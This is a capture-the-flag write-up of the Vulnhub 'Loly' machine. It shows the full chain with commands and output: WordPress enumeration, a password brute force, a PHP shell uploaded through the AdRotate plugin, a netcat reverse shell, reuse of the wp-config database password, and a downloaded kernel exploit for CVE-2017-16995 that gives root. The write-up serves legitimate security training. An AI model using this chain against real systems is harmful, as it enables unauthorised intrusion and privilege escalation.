Vulnhub - Loly

Posted on | In
My writeup on Loly box.

You can find the machine there > Loly

Summary

This machine is an easy one, starting off we can find a wordpress installation and we gain access to it by running a brute force attack on the user. Shell uploading was a bit tricky, because common ways were blocked. After privilege escalation to first user was pretty easy we just have to look at wp-config file a really common method & the root one is a simple kernel exploit. Let’s pwn it! :sunglasses:

Enumeration/Reconnaissance

Let’s start as always with nmap.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
 
$ ip=192.168.1.15
$ nmap -p- --min-rate 10000 $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-14 22:22 EEST
Nmap scan report for loly.lc (192.168.1.15)
Host is up (0.0013s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:C1:62:D5 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.26 seconds
$ nmap -p 80 -sC -sV -oN nmap/initial $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-14 22:23 EEST
Nmap scan report for loly.lc (192.168.1.15)
Host is up (0.00038s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!

Visiting the web page, is just the default nginx page. No /robots.txt and such stuff so let’s move on and run gobuster.

1
2
 
$ gobuster dir -q -u http://$ip/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html
/wordpress (Status: 301)

/wordpress isn’t loading properly, checking the html code we can see a dns-prefetch and a domain name that’s probably a virtual host let’s add it to /etc/hosts.

1
 
<link rel='dns-prefetch' href='//loly.lc'/>

1
2
3
4
 
$ nano /etc/hosts
$ cat /etc/hosts
..data..
192.168.1.15    loly.lc

Now we can see the wordpress site, let’s run a wpscan on it to detect plugins/users.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
 
$ wpscan --no-banner --url http://loly.lc/wordpress/ -e ap,u

..data..

[i] Plugin(s) Identified:

[+] adrotate
 | Location: http://loly.lc/wordpress/wp-content/plugins/adrotate/
 | Last Updated: 2020-09-08T17:49:00.000Z
 | [!] The version is out of date, the latest version is 5.8.8
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 5.8.6.2 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://loly.lc/wordpress/wp-content/plugins/adrotate/readme.txt

[i] User(s) Identified:

[+] loly
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

Interesting, without wasting more time let’s run a brute force attack on loly user.

1
2
3
4
5
6
7
8
9
10
 
$ wpscan --no-banner --url http://loly.lc/wordpress/ -U loly -P /usr/share/wordlists/rockyou.txt 

..data..

[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - loly / fernando                                                                                                                                                             
Trying loly / corazon Time: 00:00:04 <==============================================================================================================> (175 / 175) 100.00% Time: 00:00:04

[!] Valid Combinations Found:
 | Username: loly, Password: fernando

Shell as www-data

Perfect now we can login in, admin panel is under /wp-admin. Here i got stuck for couple of minutes, tried ton of stuff but no luck spawning a shell. Anyway then i remembered the plugin adrotate i enumerated a bit and i found a way to upload a shell & execute it! Follow my steps:

1) Zip your shell!

1
2
 
$ zip shell.zip shell.php 
  adding: shell.php (deflated 59%)

2) Upload it

3) Execute it

Enumerating the settings of the plugin i found out the where it saves the files:

1
 
$ curl http://loly.lc/wordpress/wp-content/banners/shell.php

1
2
3
4
5
6
 
$ nc -lvp 6666
listening on [any] 6666 ...
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@ubuntu:/$ whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Shell as loly

A common method is makers to “hide” the user password under wp-config.php file, so i always check that first and 95% it works! :grin:

1
2
3
4
5
6
7
8
 
www-data@ubuntu:~/html/wordpress$ cat wp-config.php | grep "DB_PASSWORD"
define( 'DB_PASSWORD', 'lolyisabeautifulgirl' );
www-data@ubuntu:~/html/wordpress$ su - loly
Password: lolyisabeautifulgirl

loly@ubuntu:~$ whoami;id
loly
uid=1000(loly) gid=1000(loly) groups=1000(loly),4(adm),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare)

Shell as root

I did lot of enumeration but nothing, so my last hope is to be something like kernel exploit. I always love to run linux exploit suggester to speed up the process. Always check for highly probable exploits first.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
 
loly@ubuntu:/tmp$ wget -q https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
loly@ubuntu:/tmp$ bash linux-exploit-suggester.sh

..data..

Possible Exploits:

[+] [CVE-2017-16995] eBPF_verifier

   Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
   Exposure: highly probable
   Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
   Download URL: https://www.exploit-db.com/download/45010
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

This seems perfect, let’s download and test it out.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
 
loly@ubuntu:/tmp$ wget -q https://www.exploit-db.com/download/45010 -O 45010.c
loly@ubuntu:/tmp$ /usr/bin/gcc 45010.c -o r00tplz
loly@ubuntu:/tmp$ chmod +x r00tplz
loly@ubuntu:/tmp$ ./r00tplz
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88000008c900
[*] Leaking sock struct from ffff88003990d640
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880032acc480
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff880032acc480
[*] credentials patched, launching shell...
# whoami;id
root
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare),1000(loly)

Let’s read the flag.

1
2
3
4
5
6
7
8
 
# cat root.txt
  ____               ____ ____  ____  
 / ___| _   _ _ __  / ___/ ___||  _ \ 
 \___ \| | | | '_ \| |   \___ \| |_) |
  ___) | |_| | | | | |___ ___) |  _ < 
 |____/ \__,_|_| |_|\____|____/|_| \_\
                                      
Congratulations. I'm BigCityBoy

Was fun, enjoyed it a lot! :smile: